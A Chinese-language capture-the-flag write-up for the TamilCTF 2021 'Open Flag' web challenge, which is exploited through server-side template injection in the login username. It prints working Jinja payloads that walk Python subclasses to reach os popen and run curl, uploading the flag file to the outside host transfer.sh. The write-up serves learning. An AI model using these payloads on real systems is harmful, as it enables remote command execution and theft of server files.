TamilCTF2021 Writeup

Open Flag


访问题目中给出的链接,发现是一个登录页面
Open Flag
随便输入一个用户名和密码直接可以登录,提示我们flag文件的路径是./flag.jpg.
F12看源码发现注释中会显示刚才登录所用的用户名,猜测存在SSTI漏洞,直接用注入代码作为用户名登录即可
image-20211119203608270

使用下列代码作为用户名登录,查看当前已加载的模块;删掉HTML的注释标记<!--,找到os._wrap_close模块所在的索引为132,借助于popen函数可以直接执行系统命令

{{"".__class__.__bases__[0].__subclasses__()}}

image-20211119212248483

使用curl命令将flag.jpg文件上传至transfer.sh

{{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('curl --upload-file ./flag.jpg http://transfer.sh/flag.jpg').read()}}

在HTML注释中找到文件上传后的URLhttp://transfer.sh/bDGBlw/flag.jpg
image-20211119204635015

Open Flag

flag:TamilCTF{SsTi_Is_VeRy_DaNgErOuS}

您的支持是我继续创作最大的动力!

欢迎关注我的其它发布渠道